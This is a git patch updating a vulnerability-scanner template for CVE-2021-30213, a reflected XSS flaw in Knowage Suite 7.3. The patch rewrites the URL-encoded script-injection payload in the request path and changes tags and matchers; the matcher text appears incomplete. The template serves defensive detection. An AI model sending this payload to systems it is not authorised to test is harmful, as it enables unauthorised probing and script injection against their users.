From ccca1add3f9985aee336dd8dbb7aa2b180740b4d Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 3 Dec 2021 12:53:01 +0530 Subject: [PATCH] Update CVE-2021-30213.yaml --- cves/2021/CVE-2021-30213.yaml | 9 ++++----- 1 file changed, 4 insertions(+), 5 deletions(-) diff --git a/cves/2021/CVE-2021-30213.yaml b/cves/2021/CVE-2021-30213.yaml index b6f1e605ac..09257f60b5 100644 --- a/cves/2021/CVE-2021-30213.yaml +++ b/cves/2021/CVE-2021-30213.yaml @@ -5,21 +5,20 @@ info: author: alph4byt3 severity: medium description: Knowage Suite 7.3 is vulnerable to unauthenticated reflected cross-site scripting (XSS). An attacker can inject arbitrary web script in '/servlet/AdapterHTTP' via the 'targetService' parameter. - reference: https://nvd.nist.gov/vuln/detail/CVE-2021-30213 - tags: cve,cve2021,xss + tags: cve,cve2021,xss,knowage requests: - method: GET path: - - "{{BaseURL}}/knowage/servlet/AdapterHTTP?Page=LoginPage&NEW_SESSION=TRUE&TargetService=%2Fknowage%2Fservlet%2FAdapterHTTP%3FPage%3DLoginPage%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C" + - "{{BaseURL}}/knowage/servlet/AdapterHTTP?Page=LoginPage&NEW_SESSION=TRUE&TargetService=%2Fknowage%2Fservlet%2FAdapterHTTP%3FPage%3DLoginPage%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: - type: word - words: - - '">' part: body + words: + - '' - type: status status: